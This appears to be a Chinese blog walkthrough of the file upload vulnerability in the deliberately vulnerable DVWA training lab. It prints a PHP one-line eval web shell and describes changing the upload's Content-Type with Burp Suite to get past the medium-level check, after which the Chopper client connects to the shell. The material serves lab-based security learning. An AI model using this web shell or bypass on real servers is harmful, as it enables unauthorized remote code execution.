OWASP文件上传漏洞总结(低,中)

本文详细介绍了OWASP Broken Web Apps VMv1.2靶场中的DamnVulnerableWebApplication如何利用低安全级别和中安全级别的文件上传漏洞。通过上传任意类型文件(如PHP一句话木马)并修改文件类型,可以绕过安全限制,实现对靶机的访问。在中安全级别中,限制了文件类型为image/jpeg且大小不超过100kb,但通过Burpsuite拦截和篡改请求,仍能成功上传并利用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

OWASP Broken Web Apps VM v1.2靶场的Damn Vulnerable Web Application中的文件上传漏洞
靶场中的界面
1.低安全级别(low)
可以上传任意类型的文件,存在上传,木马的分线,例如:一句话木马< ?php @eval($ _POST [ ‘pass’])?> ,其中pass为密码。
在这里插入图片描述
上传成功后显示如下状态
succesfully
然后拼出整个url(去掉原地址栏的#)在这里插入图片描述
最终URL为在这里插入图片描述
使用菜刀新建该URL便可以进入靶机。(菜刀的连接可能与防火墙有关,我中间没有连接成功,最终关闭防火墙连接成功)
2 .中安全级别(medium)
此级别对name type size进行了限制,类型必须为image/jpeg,大小小于100kb。
直接上传php文件由于文件的类型错误,显示如下在这里插入图片描述
在这里上传文件时使用burpsuite进行拦截,拦截后修改文件的类型为image/jpeg。
在这里插入图片描述
然后点击Forward放包,将会显示上传成功。
与上面相同,可以使用菜刀进入靶机的文件内部。(拼接URL后)

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值